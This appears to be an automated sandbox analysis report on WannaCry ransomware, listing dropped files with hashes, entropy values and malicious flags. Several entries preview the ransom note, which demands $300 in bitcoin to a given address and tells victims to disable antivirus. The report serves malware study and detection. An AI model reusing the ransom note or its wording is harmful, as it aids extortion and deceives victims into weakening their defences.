                                                  Entropy (8bit):7.857345873249316
                                                  Encrypted:false
                                                  SSDEEP:24:bk+nlYLsOWwrc3mz68lzQmMW3tPI3pfYiN2I7fYO2Myu1G0Ex02TvziHP7MJvjrb:bknLsUcWuLmMWtAZQvGYmu7vziHP7mBd
                                                  MD5:47F102326749FF57A0732F884AF0266D
                                                  SHA1:77354DDD18E32BEAB839C1416C8F6F75F84A7BDA
                                                  SHA-256:308A19024B147FBC4BE87291F308F1B2BEFE8B5C9549412959D8753FE31877D7
                                                  SHA-512:1070E934DACDFD2DCDC37EA737191E72FC95ED60093A4A5089439CD2140481FAF7173DD5D3F276895E122B751035C003DBAB216DB47E8F44AB15456F4811BB2B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.852353575907645
                                                  Encrypted:false
                                                  SSDEEP:24:bkmns7M68k6q89xg+q48lEqICiP4Psw1F6mXrBm89hxM8I:bkmnOHx6qlB4tqIGsw1F6KrBpFMj
                                                  MD5:B377A7AEFD366065EC2CEBBB6D7CD909
                                                  SHA1:4B9508A33FC5E7C8818471BA760B42271788AA65
                                                  SHA-256:158E4D6C1F955B94C9440F048FBAA612E3740268109F6A69A7808D4009F1BDE5
                                                  SHA-512:267C5DA8028447914B1DCA3A9289C195F6987973185028A9F6781D3397467CF3EDCE9A45D3260DD0834E52167FDCAD7DB523DE795F2339E72ECA01D27FACA720
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20760
                                                  Entropy (8bit):7.990145083899708
                                                  Encrypted:true
                                                  SSDEEP:384:Ewe/p880UYNR1LV+/WvbNtgvcvZgA9hK3fTn/k/hdfutPf/j1K93F:ypmUc5vb3xMT8Ghf/jsJF
                                                  MD5:255A7AEDBE93176C8452791CFFA427BC
                                                  SHA1:DEE4A532207CFBEE97C774FE8905A9F5E1DB4D44
                                                  SHA-256:51D15BD3BE0D6CEA87D363C5F65ECBE2822B3A576D2AC0437FA41591F6AE6A83
                                                  SHA-512:B6253B3A6C9FC86156C4A83A5705D4895CD8343057A52FD1C13132F21E33D6152D7F4B8E1A4577EF040997A257C26B2291DBACAB8F2A917E174F79F3BDC31F04
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1368
                                                  Entropy (8bit):7.840995518833475
                                                  Encrypted:false
                                                  SSDEEP:24:bkF4/SW7MrB297eFxjybuhTwSiBaeG+wsuBxMp4VYFXdhNPiDIEL+Qiz9FDJQ:bkF46W7MrBO7UxjIjQX7W4+5d3PiDIEn
                                                  MD5:F9254FD251DDE5DE89A2816266A8979A
                                                  SHA1:5C79CCCDA7F5E14CF5AA9EE028E4B9BECA057193
                                                  SHA-256:BFF3A77FB5FB64351CB364F160C984818C6C040E03C3D9C757AA59EAA8FEB210
                                                  SHA-512:07E348A7BBA0ACBDDA249C103D37092E02D13B0D7E3EC716B3EF1741E24837F96A58A677932424763DF28779203B991DBAFE6F5A28607FF536F83CE90D1CC84F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5096
                                                  Entropy (8bit):7.964858957218272
                                                  Encrypted:false
                                                  SSDEEP:96:oDo+bbmjZPRATp+fOeV9s2wQMgV5FhiMRle/KzKJpjvwlRxDv:MWjmSOxn84YleyzQd4xDv
                                                  MD5:A125F004FE67F0883191214F1703715E
                                                  SHA1:2D686FFD7B21C0471B4198A7F987C7380AB52DD5
                                                  SHA-256:D28D3ABF00AD7EC551C55D67B108744C0BFAC9E873C5EF47AC9828FA059A087B
                                                  SHA-512:973197766551B6EE0ED9C78E97BBFA3F65AB3BC71023CECAC6E8E5B07C2DB259B4126D4A1CD7E57C2C5E42E1B48A122A0935F85A93491AF0EAFB5EC987E81644
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5096
                                                  Entropy (8bit):7.9591959155291265
                                                  Encrypted:false
                                                  SSDEEP:96:oE0yCVXjl0ahP7O45KsUnuGryPxPjR/rjx8l7CKw1lCcV1c4qjF+m32:vHGdhP7Odry5J98h4lCcMVG
                                                  MD5:B495A26E8F1988F7950ED91A537CDAD5
                                                  SHA1:3EEF940B167652D6BC047672D926934E25CA328A
                                                  SHA-256:B0CCF1C5B84C7E2E434550B7232B3AFADFAB12BD4FF50E26B66894FE01D8A154
                                                  SHA-512:A9319283E61135F08E263B747EFD69044A45F4C1875447AC63CCDF9347CBC76C3CF2C0B1F454891C6474207E0BDD83B0FF315DB9346DD86282508B300DB8C152
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1032
                                                  Entropy (8bit):7.757964197400796
                                                  Encrypted:false
                                                  SSDEEP:24:bkSO6ATc6kEjvt5N9cnvvdcBLt3MuPtKEqLH:bkSO6Aw2jUX6hXAEqLH
                                                  MD5:50D3DD6CBA00E4E0D02A6FF7CEFD9B2D
                                                  SHA1:BD29D6D99503704617A72D148E70210CE42E74D9
                                                  SHA-256:DE1CA328EA4A0A0CE138235FA173E9939394468FF0C85DDED7C672A6BEA52140
                                                  SHA-512:B348C9762E0F9D84A31FF1C546F42C13673DD29534EA4C7CCF4E8261E53BB1BFF57CA15672F6DDC5977F4FBBF694508A83F1DA2FDB98A1B4BC050A26BC7876CE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1112
                                                  Entropy (8bit):7.844897200419837
                                                  Encrypted:false
                                                  SSDEEP:24:bkWBVdUFqGc04vsI/cfzafKseX1nArAp0Pe2DVHb9jcfs71+vHVHIzNx:bkWBox4vT/XfKpX1Arwj2DV79w4oKzNx
                                                  MD5:78932A9DF2EF36C829E438200A795F65
                                                  SHA1:B0B58019A6BFD177694F9503FF849656BA328213
                                                  SHA-256:49944B9ABA7845D5E2132536F2CD8DD53F39D2A233436AEA83028C48021DC7FE
                                                  SHA-512:A36B50BBB4A9C6AB5F018EA6F17E6DEA2216528CEE7007A9316428D8FE7222DEF29D4C039196A1E7C9DEFAD5A2AB4C1CA56C6E20610C768A5CB6C2D45629B5F4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1768
                                                  Entropy (8bit):7.880875703376416
                                                  Encrypted:false
                                                  SSDEEP:48:bkaPNiDsaQ0SSslLe44zPDPdeWpQSmOPC+jZvk0rzE:oaPNiDsaQPdr4TIW+TMNvdrw
                                                  MD5:8FDDECC7CD71B1641B2F95ABB9EEEC49
                                                  SHA1:B74A3DD04EE1304DDFA0526D59A39AF1FE03CBAD
                                                  SHA-256:462E2C0D75F5848406E692866F53D7F8F3169D7B438E6304B14B3A04432A1924
                                                  SHA-512:701BFD58C49F09610E05BA1AB88FCC611148EB6BD2667382E9BEAC4EF97666382C10551ECF62290526E21157CDCE96B629D5CCFDA348D7E2C3DAA65EEB3BEC63
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1032
                                                  Entropy (8bit):7.7768249846089965
                                                  Encrypted:false
                                                  SSDEEP:24:bk7rkF8iXJDLv3+0aFX5c+ehOAwg/EEghzOs5F9r:bkezXh7+9aHheg8EgQs5F9r
                                                  MD5:4E36B8C9DC7F15A4E214A9B219711992
                                                  SHA1:B39B245ACE240D06C0FF2E8B701D7E95E5B39DDA
                                                  SHA-256:D2D1FFA0DEC83C35FBE3A0395B504C098963658F0C7CCBEB7BCCBBA8272D9D3C
                                                  SHA-512:F18AA968F7AB1E3F020FC8262628C69D26F6362EF4AC82E864C5230D5E5048A49BFD6498E85E937B99610E648908AD53978B1AC1B1B7A739D9E19D3C7F04EEA1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5256
                                                  Entropy (8bit):7.959782532493342
                                                  Encrypted:false
                                                  SSDEEP:96:oqxtCoo3BhaTjfb0qyFp4ID+Um0dcAXkbrjWQHA0ICpOmpf3T0RD0MkwUXH6OUbJ:5tDo3OT3zVUm0iTrjJAqOU3TED0+UXzs
                                                  MD5:E84BFBC74C36656981BC5BCDA510A4E4
                                                  SHA1:D1E316955F8A21ACD199E43A4B4380252550170B
                                                  SHA-256:DB8C1DEE0062E0E884F9E85F8678415E7F7704A0336CA97ECB9420C6CB9DF86E
                                                  SHA-512:C746FEDF674CBCC6A745909E58F737C222CAC3C891666C32A7F2DE0CCDF5CA0E8C4BF66D9B605DAACD522BD146E2F6F8F75118E860778AF51CE7B4CA0D41470A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):548472
                                                  Entropy (8bit):7.999642908255512
                                                  Encrypted:true
                                                  SSDEEP:12288:ve+IJa6FfQ3sCMUGT0jk1M3kEiU3qHGnyWkuVWgf8ZUceIyokb:rIJa6Fa1PGT0yM0Q3cGnQWWfZ6N
                                                  MD5:24A40E4AAE4E8F84B9221862B9B84139
                                                  SHA1:4C9E6EC9A4FF08EFFAB0B841DBF868068BAED628
                                                  SHA-256:E3F711AEF9D735E84BCCFBFBE76B19A157502EDE35FC91CA7D594C3B77FE45A1
                                                  SHA-512:B23BDB06FAA83F88D0DEBE477081B07D45232FF06707E697BD9BFDF33A96B3BA6EBBF038473B6495D6CBA9EACF3CFF644B0C50796343318A888F80C4E7999EEA
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2972600
                                                  Entropy (8bit):7.999934370710863
                                                  Encrypted:true
                                                  SSDEEP:49152:ycTIcXzlmw4tX9g2ztG0+15uKEJdLXzHp5VavXF1kldQOYcreW+5:ycsF5dw1REDXzp1jQOYqN+5
                                                  MD5:F8236C42AAE4E3C8FD1D032B18EF85FD
                                                  SHA1:C5385D676A7740C16901B33BCB5AF239AFE7252A
                                                  SHA-256:251669C56783100FB5615F1BD7C5636520CBC7C398A73E080F6B8F6F287C30DD
                                                  SHA-512:EDBDA1C3691415BA9DA7FC599A73DADAE742089FE6D69AAEED2532930F9F07C4238E07C87B16A1E6C95847F11B6A8B8155F232F2337971EB964982FAACECCF4A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):130040
                                                  Entropy (8bit):7.998423828929835
                                                  Encrypted:true
                                                  SSDEEP:3072:9n1W6/AW7m3TKqlP4iEmKgJ7Fr4txpkJLA32BcI67vL:fWiv7mKeUgpKtxpJy27D
                                                  MD5:7210A5BD2CF42D2DF0F5E93E72A2C684
                                                  SHA1:C6ACC908BF46775A95FCDD229F74797370DCA474
                                                  SHA-256:F20DE54655BD49392DA0E4B0558AF422FCEC375E8D077FB93BD5A2F1F3158196
                                                  SHA-512:0EBA54B444936BEC64505527C7C0938D69E0CBCDF5B7E0A30F60B0FF1A6D7BD37A29DCB7683127E369FA57AD396CE8F0C20D10CE1C96BB5421DE436F2C7BDA4B
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):44776
                                                  Entropy (8bit):7.996073182271237
                                                  Encrypted:true
                                                  SSDEEP:768:Kk3PaHHH4LJpQngcvLP6b9Jo4tWk14Q+EQPG1XRTTTA7HN1VksnbPV:KmanH41KXCb9JJZvtXRXTaH
                                                  MD5:4340905A0CE34D0A57F243FF37557E3C
                                                  SHA1:C1127BA7090EC1EE1356F4BE18AC711108055157
                                                  SHA-256:BB9E6826049EE66924B114A13D4146B7355D979CB3E49244D9A92DEC425E5958
                                                  SHA-512:108454286064D8866A09226CC826C5B073CC97589D9AA94D129697F57CB0FF3F29FBA65E1303DBA13445D4BA02C8A29F9BB4CE7500BB4D68434230EA57F8987F
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):29160
                                                  Entropy (8bit):7.992258615085787
                                                  Encrypted:true
                                                  SSDEEP:768:eXPZFomakFXccG/DeM7eFEFaxG23ZnjuOaEBLCi4en:gZF5FXHXG25qaOiL
                                                  MD5:69B5C93FB3F3CA427B070F6C6D9259D6
                                                  SHA1:0A689068BE15E04F5E29CBE7A96D913F093DA3A2
                                                  SHA-256:F2788B6EF75B8684E4BED344579DDF1938014A4D143EAB0B76CD4A1C7A8CA1D6
                                                  SHA-512:5DB3F5147743C62BB60302F7C9C8E92A59974BBD848A7C2A2595DB7A86C141E24E7F290882DE4D1336DF52EC63FD50F9EDB99A905FE3219B3AF8AE7491D1798B
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):39672
                                                  Entropy (8bit):7.9952889666973075
                                                  Encrypted:true
                                                  SSDEEP:768:d4RRSbMKFyV3R12KCadk4Vgex3opxMHk0INoQ61u2s+0EngrHi:yR4fyv12Idnq2Ypx0UiQ6s2ZZngrHi
                                                  MD5:5288ED3C2FB7ED3EA8A8D717C53FE77A
                                                  SHA1:2E2D6BBFC2688AF3754D5355EA88AF9A6FFA73D2
                                                  SHA-256:9CC214666967FCB55B5B1EB28782E5A25417ADB04617309D95E95834B7E68D89
                                                  SHA-512:6431AD74DC6A3A08FE9732D2DE620FE87AC1695255B404C0756D905AFD623896E27828EB3458CE304298CB1C6E16DBFA0CBAC2175CAB2A13C4864D20E69FA996
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):130040
                                                  Entropy (8bit):7.9986653638378735
                                                  Encrypted:true
                                                  SSDEEP:3072:lj7Bzllc2gb1LwgT3QebMCMvcZ0c9JBEVFHVFc:l3NcPbagtZFBEVFc
                                                  MD5:62CB0FB09F5BA2C60E0B754DFE6D7528
                                                  SHA1:654F16B6742B75B299AEFF6B6BC3C7AB7D427E03
                                                  SHA-256:FC830722F737976FC0AA8E228609C7C3FCEA0F617EAC5AE98AB1C9DE675AAAA9
                                                  SHA-512:4DCD3C99F62FCA9262EDCEC4930332A030738960007F575DCA75B3DAD6001A2A23E2471447E7E48DF0B8C6515C8363F03F93A44C00BB2F249FB657E7BABBCAE9
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):29160
                                                  Entropy (8bit):7.993650125247031
                                                  Encrypted:true
                                                  SSDEEP:768:pw+mxSR+TG0SVAh3nKQwZ/4q0sOKJMk0MprVYUW2:O+mxSR+TfSVAxqZ/4sOEMkdlVY2
                                                  MD5:6316C2D737FAB580C7253D3AD17CEA76
                                                  SHA1:88C2514EF43C3AF3CADB65EEAFEC9857B41AF480
                                                  SHA-256:9CB8314EFA97A2DE83127033FDF362BFB558DBE14AB9DEBD7CC1F3B8D4D61BB8
                                                  SHA-512:6E6309849B3AF8FCB3AFF60AA3F6FFC7B3B721EC7F7A8ADB0F821A968F0303D65E27230E6698AD0F6D688254B9EB19C930474EA7A05A2915D0A991B0FE629DE0
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):98584
                                                  Entropy (8bit):7.998238822248994
                                                  Encrypted:true
                                                  SSDEEP:1536:3AJD66/4y5LsqtjE6aEvKkEczWGZicYLgrt1mK8tIDTVkNBQKEHOH6X8SpCVwq7:3ot5gS4IvEcznZntuKtVkVElpCX7
                                                  MD5:F183801219DDB0C7B30C43E94BAB5BC6
                                                  SHA1:B1C95371E4C1236251B5A94F926DA4B24CEFBD1E
                                                  SHA-256:5A97FDDE81496DD81C26F5562FCD17DBB63C88401BF9C6E0F29E6D28DA8C4978
                                                  SHA-512:B36622B9F44A15F3394B4A08A8DEAF8A1A865B8C7E4AB956FF233F9E77670DC30FFB5A0D004AEE50895531BFD055FD952BE02AC18509B97B9EC2708C121561F9
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):33048
                                                  Entropy (8bit):7.993738689704845
                                                  Encrypted:true
                                                  SSDEEP:768:XhZf2hObb2QjRvWSPORBWW+rEyiSWJ+5Jje8E:ff2w8SP+AJrkUjK
                                                  MD5:F1D72D05F9CFD54FB9E90203E8519518
                                                  SHA1:940CB2DAE7FC49C840A12756562D57369C8FAF8F
                                                  SHA-256:E95DEC486E9826A43CA05A987C8F51169EE4CD4814A0C92B0127C0F60B701D52
                                                  SHA-512:DE43ABCDFD09FF084725C516DA442577B80248510BE7EAA24693F9D9D80AA4214BA2ADCC5503A873EE3678AE8FC7D394F2D00E57AD24C19B8D7346E796120A5F
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):24856
                                                  Entropy (8bit):7.9923321553526705
                                                  Encrypted:true
                                                  SSDEEP:768:i0syZ6mtOfs6O1m7qnEv65J12o4otXBTGZ:i0rntas6yKut2gtRCZ
                                                  MD5:18D01CC1C5C199D2652F72F6D06B139E
                                                  SHA1:9D6B9499ED4152117163FB6C2D3CADFF74ED4EF3
                                                  SHA-256:A09016B632DBAD9B4C8576C99FDFF50BF868C447790FE42A1C6E3457B1EE3A4C
                                                  SHA-512:521FF974BA1273C0281CA64CB7ED766498A3C6932873999942F798C9D8B4919BA7D08E82D5868B784DE9E3B25FF0B5C3BC3B029C95B6C3E18F0B315C1333F5DB
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296
                                                  Entropy (8bit):7.124613151899644
                                                  Encrypted:false
                                                  SSDEEP:6:bkEh193V17r00acnV5aOeF1PFm6dB9GycnqeGnIRS01UvcmdKwsVWuv:bkEh/l17IUcvFDL/teG4S0qvJIkI
                                                  MD5:11DD56FE8A33411C1228D12F23E34EB5
                                                  SHA1:45801022373EA9CFCA8CD1FCFA76A4A22728C4DA
                                                  SHA-256:3391363D64E5981CD0CAC47CF6A8615302D10CA67F99893D5CC968C09FD6F302
                                                  SHA-512:AF0112F007AF9DD4B35ABAF7C58FF3B3EEE444670CAC690E2F144230866CC88B96B0388311B053521D989C6C23FFDDC7C1BA85847726DAE45D3EADCC22F1C58A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1311000
                                                  Entropy (8bit):7.999851573369062
                                                  Encrypted:true
                                                  SSDEEP:24576:IVppzLOfr2WKpOJPoJc/4UiWY63TpxMLC6kymE6sTDJE8sKkYsCul:ydifrJBxSWY61iSyncxKkYsZ
                                                  MD5:126796AD0E78F2FF84BC2DBFA8DDBF59
                                                  SHA1:22A8306FD61817A5C5B83E895CAC9CC7F300EEEB
                                                  SHA-256:40A6EC570B32E03F9472D00392FF12AA8700D6A4A6979CF83582763DBC8580A8
                                                  SHA-512:1921062EBF7CC7009A3BAB1FA308F1AE6F868C7918F55C4C083C9142DE5C14A474E396D13C70C873EB455FF323A2BA80F4765C36602429F87F6FFD0773A8F3B6
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):25166104
                                                  Entropy (8bit):7.999991713075792
                                                  Encrypted:true
